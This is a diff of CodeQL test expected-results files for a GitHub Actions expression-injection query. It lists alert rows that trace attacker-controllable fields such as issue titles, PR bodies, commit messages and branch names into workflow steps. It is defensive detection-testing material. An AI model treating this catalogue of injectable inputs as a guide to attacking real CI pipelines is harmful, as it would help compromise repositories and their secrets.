| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref deleted file mode 100644 index edaea6fbb219..000000000000 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected similarity index 70% rename from ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected rename to ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 8236c4d78291..9101c80a5955 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -63,10 +64,15 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | 
@@ -194,73 +200,77 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
